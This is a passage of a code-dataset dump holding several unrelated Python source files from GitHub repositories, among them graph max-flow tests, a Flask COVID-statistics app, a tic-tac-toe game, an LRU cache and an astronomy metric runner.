gen_nlgs.append(casted_nlg)\n\n return gen_nlgs\n\n\n###############################################################################\n\ndef gen_fixed_len_nlgs_worker(nlg, method, str_len, fix_len):\n \"\"\"\n Generate fixed length equations based on single equation\n :param nlg: an AnalogyEquation object\n :param method: forwarding method\n :param str_len: forwarding str_len\n :param fix_len: forwarding fix_len\n \"\"\"\n\n gen_nlgs = []\n\n if method == 'r': # Reduplicating\n gen_nlgs = gen_redup(nlg, str_len, fix_len)\n elif method == 'p': # Permuting\n gen_nlgs = gen_permute(nlg, str_len, fix_len)\n elif method == 'm': # Mirroring\n gen_nlgs = gen_mirror(nlg, str_len, fix_len)\n elif method == 'i': # Inserting\n gen_nlgs = gen_insert(nlg, str_len, fix_len)\n elif method == 'c': # Casting\n gen_nlgs = gen_cast(nlg, str_len, fix_len)\n\n return gen_nlgs\n\n\ndef gen_fixed_len_nlgs(nlgs, str_len, output=None, methods='pmric', var_length=False, verbose=False,\n threads=multiprocessing.cpu_count()):\n \"\"\"\n Generate fixed length equations based on nlgs and print out the output\n :param nlgs: list of AnalogyEquation objects\n :param str_len: length of strings in generated equations\n :param output: forwarding args.output\n :param methods: forwarding args.methods\n :param var_length: forwarding args.var_length\n :param verbose: forwarding args.verbose\n :param threads: forwarding args.threads\n \"\"\"\n\n if verbose:\n print('Generate to length: {0} {1} {2} {3}'.format(*str_len), file=sys.stderr)\n print('Start generating equations', file=sys.stderr)\n\n # Multi-processing\n pool = None\n if threads > 1:\n pool = multiprocessing.Pool(threads)\n\n # If input AnalogyAlignment(s), strip into AnalogyEquation(s)\n if type(nlgs) == AnalogyAlignment:\n nlgs = [nlg_alg.nlg for nlg_alg in nlgs]\n\n gen_all_nlgs = []\n for nlg in nlgs:\n\n if verbose:\n print('Generate from: {}'.format(nlg), file=sys.stderr)\n\n # Initial list\n gen_prev_nlgs = [nlg]\n\n # Loop method\n for method_id, method in enumerate(list(methods)):\n\n # If last method, enable fix length filter\n if method_id == len(methods) - 1 and not var_length:\n fix_len = True\n else:\n fix_len = False\n\n # Print method id and name\n if verbose:\n if method == 'p':\n print('{}. Permuting'.format(method_id + 1), file=sys.stderr)\n elif method == 'm':\n print('{}. Mirroring'.format(method_id + 1), file=sys.stderr)\n elif method == 'r':\n print('{}. Reduplicating'.format(method_id + 1), file=sys.stderr)\n elif method == 'i':\n print('{}. Inserting'.format(method_id + 1), file=sys.stderr)\n elif method == 'c':\n print('{}. Casting'.format(method_id + 1), file=sys.stderr)\n\n # Sent list to generation worker\n gen_tmp_nlgs = []\n\n if threads > 1:\n for gen_wrk_nlgs in pool.starmap(gen_fixed_len_nlgs_worker,\n zip(gen_prev_nlgs, repeat(method), repeat(str_len), repeat(fix_len))):\n gen_tmp_nlgs.extend(gen_wrk_nlgs)\n else:\n for prev_nlg in gen_prev_nlgs:\n gen_tmp_nlgs.extend(gen_fixed_len_nlgs_worker(prev_nlg, method, str_len, fix_len))\n\n gen_prev_nlgs = gen_tmp_nlgs\n\n # Trigger garbage collection\n del gen_tmp_nlgs\n\n # Filter unique analogies\n gen_prev_nlgs = list(set(gen_prev_nlgs))\n\n # Print generation output\n if verbose:\n print(' - Numbers of equations: {}'.format(len(gen_prev_nlgs)), file=sys.stderr)\n\n gen_all_nlgs.extend(gen_prev_nlgs)\n\n # Filter unique generated analogies\n gen_all_nlgs = list(set(gen_all_nlgs))\n if verbose:\n print('Filtered generated analogies: {}'.format(len(gen_all_nlgs)), file=sys.stderr)\n\n # Create output stream (To file or stdout)\n out_file = None\n if output == 'sys.stdout':\n out_file = sys.stdout\n elif output is not None:\n if '.gz' in output:\n out_file = gzip.open(output, 'wt', encoding='utf8')\n else:\n out_file = open(output, 'w', encoding='utf8')\n\n # Print all out\n if out_file is not None:\n for nlg in gen_all_nlgs:\n print(nlg, file=out_file)\n\n # Close output file\n if out_file != sys.stdout:\n out_file.close()\n\n # Garbage collecting\n pool.close()\n del pool\n\n return gen_all_nlgs\n\n\n###############################################################################\n\ndef main():\n # Start timer\n start_time = time.time()\n\n # Read equations\n nlgs = read_nlg_file(args.file)\n\n # Generate analogies & print output\n if len(args.length) == 1:\n args.length = (args.length[0],) * 4\n gen_fixed_len_nlgs(nlgs, args.length, args.output, args.methods, args.var_length, args.verbose, args.threads)\n\n if args.verbose:\n print(' - Execution time: {0:.2f} sec'.format(time.time() - start_time), file=sys.stderr)\n\n\nif __name__ == '__main__':\n args = read_argv()\n main()\n","repo_name":"goodyttoor/Neural-Analogy-Solver","sub_path":"neural_nlg_solver/nlg_generator.py","file_name":"nlg_generator.py","file_ext":"py","file_size_in_byte":21537,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"21019722686","text":"class ScheduleCreator:\n def __init__(self,FoundClassObjList,generalPreferences,classList):\n self.FCobjList = FoundClassObjList\n self.generalPreferences = generalPreferences\n self.classList = classList\n self.neededCourses = self.getNeededClasses()\n print(self.neededCourses)\n\n def getNeededClasses(self):\n neededCourses = []\n for neededClass in self.classList:\n tempList = []\n tempList.append(neededClass[\"cn\"])\n tempList.append(neededClass[\"cc\"])\n neededCourses.append(tempList)\n return neededCourses\n #self.neededCourses = neededCourses\n\n def convertTime(self,time):\n try:\n #print(\"here\")\n hour = int(time[:2])\n meridian = time[6:]\n min = time[3:5]\n except:\n hour = int(time[:1])\n meridian = time[5:]\n min = time[2:4]\n #print(hour)\n #print(min)\n\n #meridian = time[5:]\n #meridian = time[:2]\n # Special-case '12AM' -> 0, '12PM' -> 12 (not 24)\n if (hour == 12):\n hour = 0\n if (meridian == 'PM'):\n hour += 12\n return [hour,min]\n\n\n def compareTimes(self,begin_time,end_time,check_time):\n #returns true/false\n check_time = check_time #or datetime.utcnow().time()\n if begin_time < end_time:\n return check_time >= begin_time and check_time <= end_time\n else: # crosses midnight\n return check_time >= begin_time or check_time <= end_time\n\n\n def checkMostIdeal(self):\n mostIdealCourses = []\n #index = 0\n for classType in self.FCobjList:\n #print(classType)\n for course in classType.foundClasses:\n #print(course)\n if course[\"accuracyList\"][0][\"status\"]:\n print(\"Most Ideal Course Found\")\n #index+=1\n mostIdealCourses.append([course,classType.subject,classType.courseCode])\n\n else:\n #index+=1\n print(\"Not a most Ideal course\")\n #print(False)\n #print(course[\"accuracyList\"][0])\n #if course[\"accuracyList\"][0]:\n #pass\n #print(course)\n #if(course.)\n self.mostIdealCourses = mostIdealCourses\n print(self.mostIdealCourses)\n #print(index)\n def createScheds(self):\n #print(self.mostIdealCourses)\n schedLists = []\n\n classSubjects =[]\n\n tempList=[]\n print(\"\\n\\n\")\n for foundClass in self.mostIdealCourses:\n #print(\"\\n\\n\")\n #print(foundClass)\n #print(\"\\n\\n\")\n addedClasses = []\n if foundClass in tempList:\n #pass\n print(\"AlreadyInList\")\n else:\n index=0\n for tempClass in tempList:\n #not running\n print(\"------------------------------------------------\")\n print(index)\n print(foundClass[1])\n print(tempClass)\n print(\"------------------------------------------------\")\n index+=1\n if(foundClass[1]) == tempClass[1]:\n print(\"Course Code already in List\")\n addedClasses.append(foundClass[1])\n if foundClass[1] not in addedClasses:\n tempList.append(foundClass[1])\n print(tempList)\n\n\n #print(\"AlreadyInList\")\n #if condition:\n #pass\n #print(foundClass)\n #foundClass.check_time()\n\n\n #out of for loop\n","repo_name":"AlexPetmecky/auto-register","sub_path":"version2/classes/ScheduleCreator.py","file_name":"ScheduleCreator.py","file_ext":"py","file_size_in_byte":3841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32836389820","text":"import haiku as hk\nfrom jax import nn\n\nfrom policies_disc.networks.network import Network\n\n\nclass Dueling(Network):\n def __call__(self, state):\n info = {}\n x = state\n info['input'] = x\n for i, width in enumerate(self.structure):\n name = f'layer{i}'\n x = hk.Linear(width, w_init=self.init, name=name)(x)\n if self.num_groups:\n x = hk.GroupNorm(self.num_groups, axis=-1, create_scale=False, create_offset=False, name=f'{name}_nosn_ln')(x)\n\n info[name] = x\n x = nn.relu(x)\n\n pre_value = hk.Linear(256, w_init=self.init, name='pre_value')(x)\n if self.num_groups:\n pre_value = hk.GroupNorm(self.num_groups, axis=-1, create_scale=False, create_offset=False, name=f'prevalue_nosn_ln')(pre_value)\n pre_value = nn.relu(pre_value)\n value = hk.Linear(1, w_init=self.init, name='value', with_bias=False)(pre_value)\n\n pre_advantage = hk.Linear(256, w_init=self.init, name='pre_advantage')(x)\n if self.num_groups:\n pre_advantage = hk.GroupNorm(self.num_groups, axis=-1, create_scale=False, create_offset=False, name=f'preadvantage_nosn_ln')(pre_advantage)\n pre_advantage = nn.relu(pre_advantage)\n advantage = hk.Linear(self.action_dim, w_init=self.init, name='advantage', with_bias=False)(pre_advantage)\n\n info['value'] = value\n info['advantage'] = advantage\n info['q'] = value + advantage - advantage.mean(-1, keepdims=True)\n return info\n","repo_name":"dyth/doublegum","sub_path":"policies_disc/networks/dueling.py","file_name":"dueling.py","file_ext":"py","file_size_in_byte":1559,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"16520270046","text":"from graph import Graph\nfrom graph_parser import graph_parser\n\n\ndef test_FF():\n graph = [\n [0, 16, 13, 0, 0, 0],\n [0, 0, 10, 12, 0, 0],\n [0, 4, 0, 0, 14, 0],\n [0, 0, 9, 0, 0, 20],\n [0, 0, 0, 7, 0, 4],\n [0, 0, 0, 0, 0, 0],\n ]\n\n for i in range(len(graph)):\n for j in range(len(graph[i])):\n graph[i][j] = [graph[i][j], 0]\n\n g = Graph()\n g.add_matrix(graph)\n g.set_source_sink(0, 5)\n g.add_vertex_names([\"S\", \"A\", \"B\", \"C\", \"D\", \"T\"])\n g._add_og_edge([0, 1])\n g._add_og_edge([0, 2])\n g._add_og_edge([1, 2])\n g._add_og_edge([1, 3])\n g._add_og_edge([2, 1])\n g._add_og_edge([2, 4])\n g._add_og_edge([3, 2])\n g._add_og_edge([3, 5])\n g._add_og_edge([4, 3])\n g._add_og_edge([4, 5])\n max_flow, matrix = g.FordFulkerson()\n print(max_flow)\n print_matrix([\"S\", \"A\", \"B\", \"C\", \"D\", \"T\"], matrix)\n print_matrix([\"S\", \"A\", \"B\", \"C\", \"D\", \"T\"], g.reverse_flow(matrix))\n\n\ndef print_matrix(vertex_names, ad_matrix):\n print(vertex_names)\n for i in range(len(vertex_names)):\n print(vertex_names[i], ad_matrix[i][: len(vertex_names)])\n\n\ndef test_valid_flow1():\n g = graph_parser(\"example_video.txt\")\n valid, matrix = g.valid_flow()\n print(valid)\n if not valid:\n return\n print_matrix([\"S\", \"T\", \"A\", \"B\", \"C\", \"D\", \"S*\", \"T*\"], matrix)\n print_matrix([\"S\", \"T\", \"A\", \"B\", \"C\", \"D\"], g.get_just_og_edges(matrix))\n\n\ndef test_valid_flow2():\n graph = [[0, 4, 0, 0], [0, 0, 2, 0], [0, 0, 0, 5], [0, 0, 0, 0]]\n\n for i in range(len(graph)):\n for j in range(len(graph[i])):\n graph[i][j] = [graph[i][j], 0]\n\n graph[0][1][1] = 1 # change this number to 3 to see the invalid flow\n\n g = Graph()\n g.add_matrix(graph)\n g.set_source_sink(0, 3)\n g._add_og_edge([0, 1])\n g._add_og_edge([1, 2])\n g._add_og_edge([2, 3])\n g.add_vertex_names([\"S\", \"A\", \"B\", \"T\"])\n valid, matrix = g.valid_flow()\n print(valid)\n if not valid:\n return\n print_matrix([\"S\", \"A\", \"B\", \"T\", \"S*\", \"T*\"], matrix)\n print_matrix([\"S\", \"A\", \"B\", \"T\"], g.get_just_og_edges(matrix))\n\n\ndef test_max_flow():\n g = graph_parser(\"example_video.txt\")\n print(\"MATRIZ OG\")\n g.print_matrix()\n max_flow, matrix = g.max_flow()\n print(max_flow)\n if max_flow != -1:\n print_matrix(g.get_vertex_names(), matrix)\n\n\ntest_valid_flow1()\n# test_valid_flow2()\n# test_FF()\n# test_max_flow()\n","repo_name":"ArmandoCivini/TDA_TP3","sub_path":"test_FF.py","file_name":"test_FF.py","file_ext":"py","file_size_in_byte":2450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"43495686974","text":"from flask import Flask, render_template,abort,request\nimport json\nimport os\nimport requests\napp = Flask(__name__)\nurl_base=\"https://covid-api.mmediagroup.fr/v1/\"\nurl_base1=\"https://restcountries.eu/rest/v2/name/\"\nurl_base2=\"https://restcountries.eu/rest/v2/alpha/\"\n@app.route('/',methods=[\"GET\"])\ndef inicio():\n\treturn render_template(\"inicio.html\")\n\n@app.route('/buscar_pais',methods=[\"GET\",\"POST\"])\ndef buscar_pais():\n nombre_pais=request.form.get(\"nombre\")\n if request.method == \"GET\":\n return render_template(\"buscar_pais.html\", nombre_pais=nombre_pais)\n else:\n r1=requests.get(url_base1+nombre_pais)\n if r1.status_code==200:\n parametros={\"country\":nombre_pais}\n r=requests.get(url_base+'/cases',params=parametros)\n doc=r.json()\n confirmados=doc.get(\"All\").get(\"confirmed\")\n recuperados=doc.get(\"All\").get(\"recovered\")\n muertos=doc.get(\"All\").get(\"deaths\")\n poblacion=doc.get(\"All\").get(\"population\")\n return render_template(\"buscar_pais.html\",nombre_pais=nombre_pais,confirmados=confirmados,recuperados=recuperados,muertos=muertos,poblacion=poblacion)\n else:\n return abort(404)\n\n@app.route('/buscar_ciudad',methods=[\"GET\",\"POST\"])\ndef buscar_ciudad():\n nombre_pais=request.form.get(\"nombre\")\n nombre_ciudad=request.form.get(\"nombre1\")\n if request.method == \"GET\":\n return render_template(\"buscar_ciudad.html\",nombre_ciudad=nombre_ciudad, nombre_pais=nombre_pais)\n else:\n parametros={\"country\":nombre_pais}\n r=requests.get(url_base+'/cases',params=parametros)\n doc=r.json()\n confirmados=doc.get(nombre_ciudad).get(\"confirmed\")\n recuperados=doc.get(nombre_ciudad).get(\"recovered\")\n muertos=doc.get(nombre_ciudad).get(\"deaths\")\n return render_template(\"buscar_ciudad.html\",nombre_ciudad=nombre_ciudad,nombre_pais=nombre_pais,confirmados=confirmados,recuperados=recuperados,muertos=muertos)\n\n@app.route('/buscar_iniciales',methods=[\"GET\",\"POST\"])\ndef buscar_iniciales():\n inicial=request.form.get(\"nombre\")\n if request.method == \"GET\":\n return render_template(\"buscar_iniciales.html\", inicial=inicial)\n else:\n r1=requests.get(url_base2+inicial)\n if r1.status_code==200:\n parametros={\"ab\":inicial}\n r=requests.get(url_base+'/cases',params=parametros)\n doc=r.json()\n confirmados=doc.get(\"All\").get(\"confirmed\")\n recuperados=doc.get(\"All\").get(\"recovered\")\n muertos=doc.get(\"All\").get(\"deaths\")\n poblacion=doc.get(\"All\").get(\"population\")\n return render_template(\"buscar_iniciales.html\",inicial=inicial,confirmados=confirmados,recuperados=recuperados,muertos=muertos,poblacion=poblacion)\n else:\n return abort(404)\nport=os.environ[\"PORT\"]\napp.run('0.0.0.0', int(port), debug=True)\n","repo_name":"Omarelhani1/api","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2919,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6029471796","text":"from tkinter import *\nimport random\nimport time\n\ndef next_turn(row, column):\n global player\n \n if buttons[row][column]['text'] == '' and check_winner() is False:\n \n if player == players[0]:\n buttons[row][column]['text'] = player \n \n if check_winner() is False:\n player = players[1]\n turn_label.config(text=players[1]+' Turn', bg = 'blue')\n \n elif check_winner() is True:\n turn_label.config(text =players[0]+ \" Wins\")\n \n elif check_winner() == \"Tie!\":\n turn_label.config(text = \"Tie!\") \n \n else:\n buttons[row][column]['text'] = player \n if check_winner() is False:\n player = players[0]\n turn_label.config(text=players[0]+' Turn', bg = 'red')\n \n elif check_winner() is True:\n turn_label.config(text = players[1]+\" Wins\")\n \n elif check_winner() == \"Tie!\":\n turn_label.config(text = \"Tie!\") \n \n \ndef check_winner():\n for row in range(3):\n if buttons[row][0]['text'] == buttons[row][1]['text'] == buttons[row][2]['text'] != \"\":\n buttons[row][0].config(bg='green')\n buttons[row][1].config(bg='green')\n buttons[row][2].config(bg='green')\n return True\n \n for column in range(3):\n if buttons[0][column]['text'] == buttons[1][column]['text'] == buttons[2][column]['text'] != \"\":\n buttons[0][column].config(bg='green')\n buttons[1][column].config(bg='green')\n buttons[2][column].config(bg='green')\n return True\n \n if buttons[0][0]['text'] == buttons[1][1]['text'] == buttons[2][2]['text'] != \"\":\n buttons[0][0].config(bg='green')\n buttons[1][1].config(bg='green')\n buttons[2][2].config(bg='green')\n return True\n\n elif buttons[0][2]['text'] == buttons[1][1]['text'] == buttons[2][0]['text'] != \"\":\n buttons[0][2].config(bg='green')\n buttons[1][1].config(bg='green')\n buttons[2][0].config(bg='green')\n return True\n\n elif empty_space() is False:\n for row in range(3):\n for column in range(3):\n buttons[row][column].config(bg='yellow')\n return \"Tie!\"\n\n else:\n return False\n\n\ndef empty_space():\n spaces = 9\n for row in range(3):\n for column in range(3):\n if buttons[row][column]['text'] != '':\n spaces -= 1\n \n if spaces == 0:\n return False\n else:\n return True\n \n\ndef new_game():\n global player \n player = random.choice(players)\n if player == 'X':\n turn_label.config(text = player+\" turn\", bg = 'red')\n else:\n turn_label.config(text = player+\" turn\", bg = 'blue')\n for row in range(3):\n for column in range(3):\n buttons[row][column].config(text='', bg='white')\n \n\nwindow = Tk()\nwindow.title('Tic Tac Toe')\nwindow_width = 400\nwindow_height = 400\nscreen_width = window.winfo_screenwidth()\nscreen_height = window.winfo_screenheight()\nx = int(screen_width/2 - window_width/2)\ny = int(screen_height/2 - window_height/2)\nwindow.geometry(f\"{window_width}x{window_height}+{x}+{y}\")\n\nplayers = ['X', 'O']\nplayer = random.choice(players)\nbuttons = [[0, 0, 0],\n [0, 0, 0],\n [0, 0, 0]]\n\nif player == 0:\n turn_label = Label(window, text = player + ' turn', font = ('Arial', 12), bg = 'red') \nelse:\n turn_label = Label(window, text = player + ' turn', font = ('Arial', 12), bg = 'blue') \n \nturn_label.pack()\n\nreset_button = Button(window, text = \"Restart the game\", font=('Arial', 12), command=new_game)\nreset_button.pack(side='bottom')\n\nframe = Frame(window, width = 10, height = 10)\nframe.pack()\n\n\nfor row in range(3):\n for column in range(3):\n buttons[row][column] = Button(frame, text = \"\", font = ('Arial', 12), width=6, height=3,\n command = lambda row = row, column = column:next_turn(row, column), bg='white')\n buttons[row][column].grid(row=row, column=column)\n\nwindow.mainloop()","repo_name":"alirezaXthm/Tic-Tac-Toe","sub_path":"tic.py","file_name":"tic.py","file_ext":"py","file_size_in_byte":4299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73151141227","text":"from django.contrib import admin\nfrom . import views\nfrom django.urls import path\n\nurlpatterns = [\n path('', views.store, name=\"store\"),\n path('cart/', views.cart, name=\"cart\"),\n path('checkout/', views.checkout, name=\"checkout\"),\n path('update_item/', views.update_item, name=\"update_item\"),\n path('delete_item/', views.delete_item, name=\"delete_item\"),\n path('register/', views.registerPage, name=\"register\"),\n path('login/', views.loginPage, name=\"login\"),\n path('logout/', views.logoutUser, name=\"logout\"),\n path('update_cart/', views.update_cart, name=\"update_cart\"),\n path('ship/', views.fill_ship, name=\"ship\"),\n path('search/', views.search, name=\"search\"),\n]\n","repo_name":"CuongLoPTIT99/MyDjango","sub_path":"Django_Pro/ecommerce/store/url.py","file_name":"url.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"780482867","text":"__all__ = (\"scimaf_dir\",)\n\nimport argparse\nimport glob\nimport os\nimport shutil\nimport sqlite3\nimport warnings\n\nimport matplotlib\nimport pandas as pd\n\nmatplotlib.use(\"Agg\")\n\nfrom . import batches as batches\nfrom . import db as db\nfrom . import metricBundles as mb\n\n\ndef scimaf_dir():\n \"\"\"Run the science batch on all .db files in a directory.\"\"\"\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--db\", type=str, default=None)\n parser.add_argument(\n \"--no_clobber\",\n dest=\"no_clobber\",\n action=\"store_false\",\n help=\"Do not remove existing directory outputs\",\n )\n parser.set_defaults(no_long_micro=False)\n parser.add_argument(\"--limited\", dest=\"limited\", action=\"store_true\")\n parser.set_defaults(limited=False)\n args = parser.parse_args()\n\n if args.db is None:\n db_files = glob.glob(\"*.db\")\n db_files = [filename for filename in db_files if \"trackingDb\" not in filename]\n else:\n db_files = [args.db]\n run_names = [os.path.basename(name).replace(\".db\", \"\") for name in db_files]\n\n for filename, name in zip(db_files, run_names):\n out_dir = name + \"_sci\"\n\n # Grab the starting date for the Presto KNe metric\n try:\n con = sqlite3.connect(filename)\n mjd0_df = pd.read_sql(\"select min(observationStartMJD) from observations;\", con)\n con.close()\n mjd0 = mjd0_df.values.min()\n # If this fails for any reason (aka schema change)\n except:\n warnings.warn(\"Could not find survey start date for Presto KNe, setting mjd0=None.\")\n mjd0 = None\n # Clobber output directory if it exists\n if not args.no_clobber:\n if os.path.isdir(out_dir):\n shutil.rmtree(out_dir)\n results_db = db.ResultsDb(out_dir=out_dir)\n # Set up the metricBundles\n if args.limited:\n bdict = batches.radar_limited(\n runName=name,\n mjd0=mjd0,\n )\n else:\n bdict = batches.science_radar_batch(\n runName=name,\n mjd0=mjd0,\n )\n # Run them, including generating plots\n group = mb.MetricBundleGroup(\n bdict, filename, out_dir=out_dir, results_db=results_db, save_early=False\n )\n group.run_all(clear_memory=True, plot_now=True)\n results_db.close()\n db.add_run_to_database(\n out_dir,\n \"trackingDb_sqlite.db\",\n run_group=None,\n run_name=name,\n run_comment=None,\n maf_comment=\"ScienceRadar\",\n db_file=name + \".db\",\n )\n","repo_name":"lsst/rubin_sim","sub_path":"rubin_sim/maf/scimaf_dir.py","file_name":"scimaf_dir.py","file_ext":"py","file_size_in_byte":2665,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"37"} +{"seq_id":"10755758852","text":"\nimport json\nimport time\n\n\nfrom azure.cognitiveservices.vision.computervision import ComputerVisionClient\nfrom azure.cognitiveservices.vision.computervision.models import OperationStatusCodes\nfrom msrest.authentication import CognitiveServicesCredentials\nfrom PIL import Image\nfrom PIL import ImageDraw\nfrom PIL import ImageFont\nimport streamlit as st\n\n\nwith open('secret.json') as f:\n secret = json.load(f)\n\nsubscription_key = secret['subscription_key']\nendpoint = secret['endpoint']\n\ncomputervision_client = ComputerVisionClient(endpoint,\n CognitiveServicesCredentials(subscription_key))\n\n\ndef call_api_with_image(filepath):\n local_image = open(filepath, \"rb\")\n recognize_results = computervision_client.read_in_stream(\n local_image, raw=True)\n operation_location_local = recognize_results.headers[\"Operation-Location\"]\n operation_id_local = operation_location_local.split(\"/\")[-1]\n\n while True:\n recognize_result = computervision_client.get_read_result(\n operation_id_local)\n if recognize_result.status.lower() not in ['notstarted', 'running']:\n break\n print('Waiting for result...')\n time.sleep(10)\n\n if recognize_result.status == OperationStatusCodes.succeeded:\n for text_result in recognize_result.analyze_result.read_results:\n for line in text_result.lines:\n st.write(line.text)\n # print(line.text)\n img_draw = line.bounding_box\n draw.rectangle([(img_draw[0], img_draw[1]),\n (img_draw[4], img_draw[5])],\n fill=None, outline='yellow',\n width=5)\n text_w, text_y = draw.textsize(line.text, font=font)\n draw.rectangle([(img_draw[0], img_draw[1]),\n (img_draw[0]+text_w, img_draw[1]+text_y)],\n fill='yellow', width=5)\n draw.text((img_draw[0], img_draw[1]),\n line.text, fill='black', font=font)\n\n\nst.title('文字認識アプリ')\n\nuploaded_file = st.file_uploader('Choose an image...', type=['jpg', 'png'])\n\nif uploaded_file is not None:\n img = Image.open(uploaded_file)\n img_path = f'img/{uploaded_file.name}'\n img.save(img_path)\n\n # img = Image.open(local_image_path)\n draw = ImageDraw.Draw(img)\n font = ImageFont.truetype(font='meiryo.ttc', size=70)\n\n call_api_with_image(img_path)\n\n st.image(img)\n","repo_name":"donakuma/OCR","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2469786818","text":"\"\"\"\n请你设计并实现一个满足 LRU (最近最少使用) 缓存 约束的数据结构。\n实现 LRUCache 类:\nLRUCache(int capacity) 以 正整数 作为容量capacity 初始化 LRU 缓存\nint get(int key) 如果关键字 key 存在于缓存中,则返回关键字的值,否则返回 -1 。\nvoid put(int key, int value)如果关键字key 已经存在,则变更其数据值value ;\n如果不存在,则向缓存中插入该组key-value 。如果插入操作导致关键字数量超过capacity ,则应该 逐出 最久未使用的关键字。\n函数 get 和 put 必须以 O(1) 的平均时间复杂度运行。\n\n来源:力扣(LeetCode)\n链接:https://leetcode.cn/problems/lru-cache\n\neg1:\n输入\n[\"LRUCache\", \"put\", \"put\", \"get\", \"put\", \"get\", \"put\", \"get\", \"get\", \"get\"]\n[[2], [1, 1], [2, 2], [1], [3, 3], [2], [4, 4], [1], [3], [4]]\n输出\n[null, null, null, 1, null, -1, null, -1, 3, 4]\n\n解释\nLRUCache lRUCache = new LRUCache(2);\nlRUCache.put(1, 1); // 缓存是 {1=1}\nlRUCache.put(2, 2); // 缓存是 {1=1, 2=2}\nlRUCache.get(1); // 返回 1\nlRUCache.put(3, 3); // 该操作会使得关键字 2 作废,缓存是 {1=1, 3=3}\nlRUCache.get(2); // 返回 -1 (未找到)\nlRUCache.put(4, 4); // 该操作会使得关键字 1 作废,缓存是 {4=4, 3=3}\nlRUCache.get(1); // 返回 -1 (未找到)\nlRUCache.get(3); // 返回 3\nlRUCache.get(4); // 返回 4\n\n\"\"\"\n\n\nclass Node:\n def __init__(self, key, val):\n self.key = key\n self.val = val\n self.prev = None\n self.next = None\n\n\nclass LRUCache:\n\n def __init__(self, capacity: int):\n self.capacity = capacity\n self.cache = dict()\n self.cache_num = 0\n self.head = Node(-1, -1)\n self.tail = Node(-1, -1)\n self.head.next = self.tail\n self.tail.prev = self.head\n\n def get(self, key: int) -> int:\n if key in self.cache.keys():\n self.remove(self.cache[key])\n self.putHead(self.cache[key])\n return self.cache[key].val\n else:\n return -1\n\n def put(self, key: int, value: int) -> None:\n if key in self.cache.keys():\n self.cache[key].key = key\n self.cache[key].val = value\n self.remove(self.cache[key])\n self.putHead(self.cache[key])\n else:\n self.cache[key] = Node(key, value)\n self.putHead(self.cache[key])\n self.cache_num += 1\n if self.capacity < self.cache_num:\n removed = self.removeTail()\n self.cache.pop(removed.key)\n self.cache_num -= 1\n\n def remove(self, rm_node):\n rm_node.prev.next = rm_node.next\n rm_node.next.prev = rm_node.prev\n\n def putHead(self, node):\n node.next = self.head.next\n self.head.next.prev = node\n node.prev = self.head\n self.head.next = node\n\n def removeTail(self):\n removed = self.tail.prev\n self.tail.prev = self.tail.prev.prev\n self.tail.prev.next = self.tail\n return removed\n\n\nif __name__ == '__main__':\n lru = LRUCache(2)\n lru.put(1, 1)\n lru.put(2, 2)\n # print('size: ', lru.cache_num)\n print(lru.get(1))\n # print('size: ', lru.cache_num)\n lru.put(3, 3)\n # print('size: ', lru.cache_num)\n print(lru.get(2))\n # print('size: ', lru.cache_num)\n lru.put(4, 4)\n # print('size: ', lru.cache_num)\n print(lru.get(1))\n print(lru.get(3))\n print(lru.get(4))\n # print('size: ', lru.cache_num)\n\n# Your LRUCache object will be instantiated and called as such:\n# obj = LRUCache(capacity)\n# param_1 = obj.get(key)\n# obj.put(key,value)","repo_name":"TQQ615/leetcode","sub_path":"数组及其他/LRU缓存.py","file_name":"LRU缓存.py","file_ext":"py","file_size_in_byte":3643,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"38089357255","text":"import sys\nimport pyfiglet\n\nif len(sys.argv) == 1:\n\ttext = input('Input: ')\n\tpyfiglet.print_figlet(text)\nelif len(sys.argv) == 3:\n\tif sys.argv[1] == '-f' or sys.argv[1] == '--font':\n\t\ttry:\n\t\t\tpyfiglet.print_figlet('', font=sys.argv[2])\n\t\t\ttext = input('Input: ')\n\t\t\tpyfiglet.print_figlet(text, font=sys.argv[2])\n\t\texcept pyfiglet.FontNotFound:\n\t\t\tprint(f'{sys.argv[2]} is not a font')\n\t\t\tsys.exit(1)\n\telse:\n\t\tprint('Wrong args')\n\t\tsys.exit(1)\nelse:\n\tprint('Too few args')\n\tsys.exit(1)\n","repo_name":"KikiMcArron/CS50_Python","sub_path":"set_4/figlet/figlet.py","file_name":"figlet.py","file_ext":"py","file_size_in_byte":485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28549578824","text":"import numpy as np\nfrom numpy.testing import assert_equal, assert_raises\nfrom skimage import img_as_int, img_as_float, \\\n img_as_uint, img_as_ubyte\nfrom skimage.util.dtype import convert\nfrom skimage._shared._warnings import expected_warnings\n\n\ndtype_range = {np.uint8: (0, 255),\n np.uint16: (0, 65535),\n np.int8: (-128, 127),\n np.int16: (-32768, 32767),\n np.float32: (-1.0, 1.0),\n np.float64: (-1.0, 1.0)}\n\n\ndef _verify_range(msg, x, vmin, vmax, dtype):\n assert_equal(x[0], vmin)\n assert_equal(x[-1], vmax)\n assert x.dtype == dtype\n\n\ndef test_range():\n for dtype in dtype_range:\n imin, imax = dtype_range[dtype]\n x = np.linspace(imin, imax, 10).astype(dtype)\n\n for (f, dt) in [(img_as_int, np.int16),\n (img_as_float, np.float64),\n (img_as_uint, np.uint16),\n (img_as_ubyte, np.ubyte)]:\n\n with expected_warnings(['precision loss|sign loss|\\A\\Z']):\n y = f(x)\n\n omin, omax = dtype_range[dt]\n\n if imin == 0 or omin == 0:\n omin = 0\n imin = 0\n\n yield 